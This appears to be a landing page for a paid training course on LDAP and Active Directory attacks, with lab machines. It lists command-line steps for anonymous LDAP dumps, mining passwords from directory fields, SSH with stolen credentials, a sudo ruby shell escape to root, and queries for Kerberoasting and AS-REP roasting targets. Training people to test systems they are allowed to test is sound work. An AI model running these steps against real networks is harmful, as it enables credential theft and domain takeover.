⭐ Premium Path · Protocol Exploitation

LDAP Exploitation Mastery

Two modules. Anonymous bind to Active Directory compromise. Extract users, credentials, and attack paths directly from the directory — no GUI, no BloodHound required for the basics.

2Modules

3Machines

⭐Premium

Get Started →

The LDAP Attack Methodology

From root DSE query to directory-assisted privilege escalation.

Phase 1 — Discovery

LDAP is TCP/389 (LDAPS 636). The root DSE query requires zero authentication and reveals the entire server configuration.

nmap -p 389,636 --script \
  ldap-rootdse TARGET

Phase 2 — Anonymous Bind

Many LDAP servers allow anonymous bind. This exposes the full directory tree — users, groups, OUs, and service accounts.

ldapsearch -x -H ldap://TARGET \
  -b '' -s base namingContexts
ldapsearch -x -H ldap://TARGET \
  -b 'dc=lab,dc=local' \
  '(objectClass=*)'

Phase 3 — Credential Mining

Description fields routinely contain passwords set by administrators. userPassword attributes may be base64-encoded clear-text.

grep -i 'userpassword\|description' \
  /tmp/ldap_dump.txt
echo 'BASE64==' | base64 -d

Phase 4 — Escalation

SSH with extracted credentials, then check sudo. LDAP machines in this path use known GTFOBins sudo vectors.

ssh USERNAME@TARGET
sudo -l
# sudo ruby -e 'exec "/bin/bash"'
cat /root/root.txt

The Two Modules

Module 1 covers standalone LDAP. Module 2 covers Active Directory LDAP at scale.

Module 1 · 🌳

LDAP — Anonymous Enumeration & Credential Dump

LDAP anonymous bind exposes the entire directory tree — users, groups, OUs, service accounts, and sometimes password hashes or clear-text passwords stored in description fields. ldapsearch is the swiss army knife; know it cold.

nmap --script ldap-rootdse TARGET (get base DN, naming contexts, schema)
ldapsearch -x -H ldap://TARGET -b '' (anonymous bind, root DSE query)
ldapsearch -x -H ldap://TARGET -b 'dc=lab,dc=local' '(objectClass=*)' (dump all objects)
ldapsearch -x -H ldap://TARGET -b BASE '(objectClass=person)' (users only)
ldapsearch -x -H ldap://TARGET -b BASE '(objectClass=group)' (groups only)
ldap-search NSE: nmap --script ldap-search --script-args ldap.base=BASE TARGET
Parsing description fields for passwords: ldapsearch ... | grep -i 'desc\|pass\|pwd'
windapsearch.py --dc-ip TARGET --full (AD-aware LDAP enum)
enum4linux-ng -L TARGET (LDAP via enum4linux-ng, auto base-DN discovery)

Tools: ldapsearchnmapwindapsearchenum4linux-ng

Bindforge CORP-DC01

🔒

Premium Content

Hands-on assignments for this module are available to Premium members.

⭐ Unlock Premium

Module 2 · 🏢

LDAP — Active Directory Exploitation

Active Directory is built on LDAP. Once you have any domain credentials, the entire AD structure is readable. Learn to extract service accounts, group memberships, and escalation paths directly from LDAP — no GUI required.

Authenticated LDAP dump: ldapsearch -D 'cn=USER,dc=corp,dc=local' -w PASS -b BASE
AD user attributes: sAMAccountName, userPrincipalName, memberOf, description, pwdLastSet
Find accounts with SPNs (Kerberoasting targets): servicePrincipalName=*
Find accounts with DONT_REQ_PREAUTH (AS-REP roasting): userAccountControl:1.2.840.113556.1.4.803:=4194304
windapsearch.py --domain-users / --da / --computers
ldapdomaindump: automated AD LDAP dump to HTML/JSON/greppable formats
BloodHound Python: python3 bloodhound.py -d DOMAIN -u USER -p PASS -dc DC_IP
Correlating LDAP user list with SMB share access and SSH credential attempts

Tools: ldapsearchwindapsearchldapdomaindumpbloodhound-python

CORP-DC01

🔒

Premium Content

Hands-on assignments for this module are available to Premium members.

⭐ Unlock Premium